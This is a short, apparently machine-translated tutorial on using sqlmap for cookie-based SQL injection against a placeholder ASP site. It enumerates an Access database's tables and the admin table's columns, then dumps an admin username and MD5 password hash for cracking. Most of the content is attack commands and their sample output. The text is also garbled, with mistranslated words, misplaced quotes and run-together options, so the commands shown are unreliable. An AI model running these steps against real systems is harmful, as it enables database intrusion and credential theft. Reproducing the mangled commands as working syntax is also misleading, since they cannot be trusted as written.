Cookie injection:
1. Suppose this URL is "http://www.xxx.org/Show.asp?" Id=9 "There is an injection point.
At the 2.sqlmap command prompt, enter the following to stopwatch.
" http://www.xxx.org/Show.asp " " id=9 " --table--level 2
Suppose the return content is as follows, description is an Access database.
-- ----------------------- [INFO] resuming back-end'Microsoft Access' -------------------------
set Number of threads: Ten
Suppose the result is returned:
-- ----------------------------------------- [ 4 tables] + -- --------------------+ admin Mark province vote+----------------------+
Four tables found for: admin Mark Province vote
3. Guess the field name of the table:
" http://www.xxx.org/Show.asp " " id=9 " --columns-t admin--level 2
Suppose you find the following fields for the admin table:
ID Username password
-- ------------------------------- [INFO] retrieved: ID [INFO] retrieved: username [INFO] retrieved: password----------------------------------
4. Guess the contents of the field:
" http://www.xxx.org/Show.asp " " id=9 " " Username,password "
Get results:
[info] retrieved: 1 [info] retrieved : admin [INFO] retrieved: 21232F297A57A5A743894A0E4A801FC3 (32-bit MD5 encryption)
Account: admin Password: Decrypt the cipher.
3.sqlmap cookie Injection of learning notes